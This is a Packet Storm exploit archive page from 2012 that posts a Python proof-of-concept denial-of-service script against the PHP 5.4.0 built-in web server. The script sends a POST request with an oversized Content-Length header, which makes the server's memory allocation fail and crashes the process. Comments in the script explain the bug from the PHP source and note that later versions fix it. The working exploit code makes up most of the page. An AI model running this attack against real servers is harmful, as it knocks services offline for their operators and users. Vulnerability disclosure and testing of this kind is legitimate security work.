exploit the possibilities

PHP 5.4.0 Denial Of Service

PHP 5.4.0 Denial Of Service
Posted Mar 24, 2012
Authored by ls

PHP version 5.4.0 built-in web server denial of service proof of concept exploit.

tags | exploit, web, denial of service, php, proof of concept
MD5 | 578c64499adaebb7da3b7d40e52c12c0

PHP 5.4.0 Denial Of Service

Change Mirror Download
#!/usr/bin/python

# Title: PHP 5.4.0 Built-in Web Server DoS PoC
# Date: 16 March 2012
# Author: ls (contact@kaankivilcim.com)
# Reference: https://bugs.php.net/bug.php?id=61461
# Comments: Fixed in PHP 5.4.1RC1-DEV and 5.5.0-DEV

# The value of the Content-Length header is passed directly to a pemalloc() call in sapi/cli/php_cli_server.c
# on line 1538. The inline function defined within Zend/zend_alloc.h for malloc() will fail, and will terminate
# the process with the error message "Out of memory".
#
# 1537 if (!client->request.content) {
# 1538 client->request.content = pemalloc(parser->content_length, 1);
# 1539 client->request.content_len = 0;
# 1540 }
#
# PHP 5.4.0 Development Server started at Tue Mar 13 19:41:45 2012
# Listening on 127.0.0.1:80
# Document root is /tmp
# Press Ctrl-C to quit.
# Out of memory

import socket, sys

target = "127.0.0.1"
port = 80;

request = "POST / HTTP/1.1\n"
request += "Content-Type: application/x-www-form-urlencoded\n"
request += "Content-Length: 2147483638\n\n" # <-- Choose size larger than the available memory on target
request += "A=B\n\n"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
s.connect((target, port))
except:
print "[-] Connection to %s:%s failed!" % (target, port)
sys.exit(0)

print "[+] Sending HTTP request. Check for crash on target."

s.send(request)
s.close()

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    34 Files
  • 2
    Jul 2nd
    15 Files
  • 3
    Jul 3rd
    9 Files
  • 4
    Jul 4th
    8 Files
  • 5
    Jul 5th
    2 Files
  • 6
    Jul 6th
    3 Files
  • 7
    Jul 7th
    1 Files
  • 8
    Jul 8th
    15 Files
  • 9
    Jul 9th
    15 Files
  • 10
    Jul 10th
    20 Files
  • 11
    Jul 11th
    17 Files
  • 12
    Jul 12th
    15 Files
  • 13
    Jul 13th
    2 Files
  • 14
    Jul 14th
    1 Files
  • 15
    Jul 15th
    20 Files
  • 16
    Jul 16th
    27 Files
  • 17
    Jul 17th
    6 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close